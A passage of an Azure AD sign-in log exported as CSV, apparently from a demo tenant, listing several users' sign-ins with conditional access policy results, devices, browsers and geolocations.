'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",16ff4ef1-f75c-48d7-9f30-d06d746c2000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,16ff4ef1-f75c-48d7-9f30-d06d746c2000,SigninLogs,Sucess,38.47222137,-77.41989899
+449,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:49.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,da89de0d-bd6b-468a-98d5-a14013718456,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",e8341e6f-1218-4a7d-a265-4d3442b54e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e8341e6f-1218-4a7d-a265-4d3442b54e00,SigninLogs,Sucess,32.32146072,34.85319901
+450,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:31.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e006eaf-bb79-4425-bf10-da8a9a7b9452,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5511ead1-bd0f-42e2-a2c1-d74a239a1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5511ead1-bd0f-42e2-a2c1-d74a239a1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+451,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:07.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21c479f-a0e1-0000-5593-c4731da7d03e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5b07faad-beec-46e1-ae61-d56dbe361a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5b07faad-beec-46e1-ae61-d56dbe361a00,SigninLogs,Sucess,33.7984581,-84.38828278
+452,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:41.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93a50b64-6d7f-4ca1-a21a-f11af3ca7e7f,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d14011b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,93d60bd4-ad49-40a5-9c6c-157d14011b00,SigninLogs,Sucess,50.6406517,5.572050095
+453,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:42.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,72a3a272-88e3-4b12-ae9e-4250f6188bbf,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f8ab7c64-069d-4e7b-982c-039d3b915b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f8ab7c64-069d-4e7b-982c-039d3b915b00,SigninLogs,Sucess,32.32146072,34.85319901
+454,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:44.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,8d88539c-7f16-4fed-a521-efcf92d35a44,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4f087f1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,268d392c-7163-4a17-b774-5f4f087f1c00,SigninLogs,Failed,33.7984581,-84.38828278
+455,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cb8c303e-0aa3-4fdd-8dab-6a847c816bac,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",a9f59943-bd83-455b-86cd-4cf1e61c1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a9f59943-bd83-455b-86cd-4cf1e61c1b00,SigninLogs,Sucess,50.6406517,5.572050095
